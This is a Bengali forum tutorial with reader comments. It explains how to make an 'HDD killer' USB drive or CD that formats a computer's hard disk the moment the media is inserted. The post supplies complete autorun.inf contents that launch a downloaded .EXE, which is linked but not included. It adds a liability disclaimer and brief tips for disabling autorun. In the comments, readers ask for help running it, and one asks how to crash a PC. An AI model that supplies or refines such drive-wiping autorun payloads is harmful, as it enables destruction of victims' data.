নিজেই তৈরি করুন HDD কিলার পেনড্রাইভ এবং কিলার সিডি। সাবধান!!কেন প্রকার ক্ষতি হলে আমি দায়ী থাকবনা।

বিদ্রঃ আগের টিউনটিতে কিছু সমস্যা থাকার কারনে টিউনটি পুঃরায় প্রকাশ করা হল ও আগের টিউনটি মুছে ফেলা হল এবং এই টিউনটি দ্বারা কেউ কোন প্রকার ক্ষতিগ্রস্ত হলে আমি দায়ী থাকব না কারন আমার আগের টিউনে আমি এর অনুমতি পেয়েছি।

HDD কিলার পেনড্রাইভ তৈরি করনঃ

এটি এমন একটি ট্রিকস য়ার মাধ্যমে কম্পিউটারের HDD পুরোপুরি ফরমেট করা যাবে কেবল মাএ পেনড্রাইভ বা সিডি প্রবেশ করিয়েই কোন প্রকার Comment না করেই। প্রথমে এখান থেকে.EXE ফাইলটি Download করুন। তারপর নোট প্যাড open করুন এবং লিখুনঃ

[autorun]

ShellExecute=filename.EXE

Label=description

UseAutoPlay=1

1

এবং Save করুন autorun.inf  নামে All Programs দিয়ে।এবার autorun এবং .EXE ফাইল দুটি  পেনড্রাইভ দ্বারা  যে কোন কম্পিউটারে প্রবেশ করালেই সেই কম্পিউটারের HDD ফরমেট হবে।

প্রতিকারঃ এটি প্রতিকার করার জন্য বা এটা থেকে যে কোন কম্পিউটারকে রক্ষা করা জন্য নিচের টিপসটি দেখুনঃ
Start > Settings > Control panel > Administrative Tools > Services > Shell Herdware Detection(dule click) > Start up type > Disabled > Apply > Ok .এবার কম্পিউটার রিস্টার্ট করুন।

HDD কিলার সিডি তৈরি করনঃ

প্রথমে উপরের লিঙ্ক থেকে .EXE ফাইলটি Download করুন এবং নোট প্যাডে লিখুন

[autorun]

open=file name.EXE /Auto

2

এবং Save করুন autorun.inf  নামে All Programs দিয়ে।এবার autorun এবং .EXE ফাইল দুটি সিডি রাইট করলেই এটি হবে একটি HDD কিলার সিডি।

প্রতিকারঃ সিডি অটোরান ডিজেবল করলে এটি আর কাজ করতে পারবে না।এ জন্য প্রথমে নোটপ্যাড খুলে নিচের কোড টাইপ করুন।

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Cdrom]

"AutoRun"=dword:00000000

এরপর DisableAutorun.reg নামে সেভ করুন। এবার সেভকৃত ফাইলটি ডাবল ক্লিক করলে একটি ডায়ালগ বক্স আসবে। Yes ক্লিক করুন। এরপর OK বাটনে ক্লিক করুন। এবার কম্পিউটার রিস্টার্ট করুন।

আশাকরি আপনাদের ভাল লাগবে আর ভাল লাগলে Comment করতে ভুলবেন না।আর একটি কথা,সবাই আমাকে প্রশ্ন করে আমি কিসে পড়ি  আমি New10(Science) পড়ি। আমার বয়স ১৫বছর (Real Birthday 29-11-1994)

Level 2

আমি আলমাস জামান। বিশ্বের সর্ববৃহৎ বিজ্ঞান ও প্রযুক্তির সৌশল নেটওয়ার্ক - টেকটিউনস এ আমি 15 বছর যাবৎ যুক্ত আছি। টেকটিউনস আমি এ পর্যন্ত 107 টি টিউন ও 1591 টি টিউমেন্ট করেছি। টেকটিউনসে আমার 3 ফলোয়ার আছে এবং আমি টেকটিউনসে 0 টিউনারকে ফলো করি।

আমি আপনাদের আলমাস। ছোট বেলা থেকেই স্বপ্ন দেখতে ভালবাসি, তাই স্বপ্ন বাস্তবায়নে ছুটে বেড়াই অজানা অনেক দূরে। অনেক সময় স্বপ্ন খুঁজতে গিয়ে পথ হারিয়ে যাই তখন, বিস্তীর্ণ উজানে একলা হয়ে চিহ্ন একেঁ একেঁ পথ চিনে নেই...


টিউনস


আরও টিউনস


টিউনারের আরও টিউনস


টিউমেন্টস

ধন্যবাদ !! তবে চিত্র সহ দিলে সবাই সহজে বুঝতো।

    Level 2

    ধন্যবাদ বাঁধন ভাই। চিত্র দিতাছি…….. 😛

How to crash pc?Hey apni ki bolte paren ami jodi xp er jonno shudu 2gb hdd die tahole ki kono pobl hobe?thanks

    Level 2

    হুম……..ধন্যবাদ। পরীক্ষা করার জন্য ব্যবহার করতে পারেন। 😛

hahaha amio new 10

    Level 2

    আসো দোস্ত !! সকল ভুলবোধাবোঝি ছৃড়ে কাধে কাধ মেলাই। 😛 😛 😛

    tai naki??????????????????????????

Level 2

হুমম… চিত্র সহ দাও।
তাহলে ব্যাপারগুলো আরো পরিস্কার ভাবে বুঝা যাবে।

ভাল লাগল
আশা করি কেউ অসৎ কাজে ব্যবহার করবে না।

    Level 2

    pic লাগাইতাছি…………….

Level 0

jotil tune
almas vai apni online asen
amar computer e kono somossa hole er jonno daeee thakbe almas vai……………….
ha ha ha……………..

    Level 2

    হা হা হা…………….. রনি ভাই আমি পালাইলাম। আমার মনে হয় আপনি আপনার কম্পিউটারে এইডা ট্রাই করবেন।
    বিদ্রঃ আলমাস এখন পলাতক। 😛 😛 😛

Level 0

can you please submit some picture with your tune…………………….i think it willbe more clear to understand…….

    Level 2

    Thxxxx pic add করা হলো।

    Level 0

    thanks for the picture but i like to know
    ————————————————
    HDD কিলার সিডি তৈরি করনঃ

    প্রথমে উপরের লিঙ্ক থেকে .EXE ফাইলটি Download করুন এবং নোট প্যাডে লিখুন

    [autorun]

    open=file name.EXE /Auto
    ———————————————–
    about this….where i have to save this…

    Level 0

    and by wich name i have to save……

    Level 2

    মেরামত করা হয়েছে……….. আপনাকে ধন্যবাদ। 😛

Level 3

খুব ভাল। 😉 সামনে আরও অনেক পথ ………. পাড়ি দিতে হবে।

    Level 2

    ধন্যবাদ ভাই আমাকে সাহস দেবার জন্য। 😛

Level 2

এিট ৈতরী করার সময় আমার িপিিসর েকান সমস্যা হবে না তো?

    Level 3

    এটি তৈরীর পর “অটোরান” হলে হার্ডডিস্কের (সব) তথ্য মুছে যেতে পারে। 🙁

    Level 2

    ধন্যবাদ monju2100 ভাই মীম ভাইকে সাহায্য করার জন্য। 😛 😛 😛

আলমাস ভাই
আমি exe ফাইলটি ডাউনলোড করে D: ড্রাইভে রেখেছি। এর পর ডাবল click করলে একটি Massage দেয়। কাজ হয়নি। আমি আপনার gmail এর ঠিকানায় ম্যাসেজটি picture হিসাবে attach করে পাঠিয়েছি। আপনি দেখে জানান। সমস্যাটা কোথায়।

    Level 2

    .EXE ফাইলটি মেরামত করা হয়েছে……….. আপনাকে ধন্যবাদ। 😛

thanks

Level 0

ভাই আসলাম। আমি তো চেষ্টা করলাম। কিন্তু পারি নি।ফাইলটা ওপেন হয় না। কি করব।?????? আপিন বলতেন….

Level 0

Thanks

[autorun]

ShellExecute=filename.EXE

Label=description

UseAutoPlay=1

Filename jaiga ta te ki exe filer name dibo?

Level 0

nice

Level 2

ভাই আবার যদি EXE ফাইলটা দিতেন তাহলে আমরা অনেক উপকৃত হতাম আমার এটা খুব দরকার ।